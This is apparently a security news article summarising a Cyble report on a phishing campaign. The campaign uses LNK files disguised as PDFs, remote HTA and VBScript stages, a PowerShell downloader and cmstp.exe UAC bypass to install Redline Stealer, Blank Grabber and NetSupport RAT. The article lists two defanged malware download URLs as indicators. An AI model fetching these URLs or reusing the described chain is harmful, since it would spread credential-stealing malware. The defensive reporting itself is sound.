Threat actors have shifted from using malicious macros to malicious LNK files for initial access. This is due to Microsoft’s announcement in 2022 to disable macros by default for Office documents downloaded from unknown sources or the internet.
The current attack vector uses the Microsoft Connection Manager Profile, which runs the process cmstp.exe for proxying the execution of malicious payloads.
This current campaign was found to be similar to the Invicta stealer infection method, but the infection chain seems to be varying. This concludes that threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases, the LNK file containing the remote VBScript infection is distributed via spam emails disguised as legitimate-looking attachments with file extensions like ZIP or ISO.
LNK Files to Exploit Microsoft Connection Manager Profile
Following the download of a ZIP file embedded with the LNK file which is disguised as a PDF file. This initiates a remote command execution of a .hta file on a remote server.
Once this .hta file gets executed, it initiates the download of the VBScript that is extremely obfuscated. This VBScript, after execution, de-obfuscates the PowerShell loader, resulting in the activation of a PowerShell downloader.
This PowerShell downloader fetches the malware files from two URLs namely,
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
These files are then stored in the AppData\Roaming directory along with their original names. The files are one PDF and one EXE file (Redline stealer library). The PowerShell downloader uses cmstp.exe for UAC (User Access Control) bypass.
Weaponized LNK FilesUncovered
As per the report submitted to Cyber Security News, the malware payloads, Weaponized LNK Files were discovered to be Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is a Python-based open-source stealer that contains a GUI builder and can be used to generate stealer payloads easily. It also provides the option to customize the stealer like custom icon, UAC bypass, and persistence during startup.
Redline Stealer is sold on cyberforums and is one of the most prominent infostealers in cyberspace. This can be used to gain unauthorized access to sensitive information like passwords, login credentials, autofill data, and credit card details.
NetSupport RAT is a commercial RAT used for legitimate remote access to users by administrators but is being misused by threat actors to gain unauthorized access.
Furthermore, a complete report has been published by Cyble researchers which provides detailed information about the obfuscation, attack vector, YARA rules, and other details.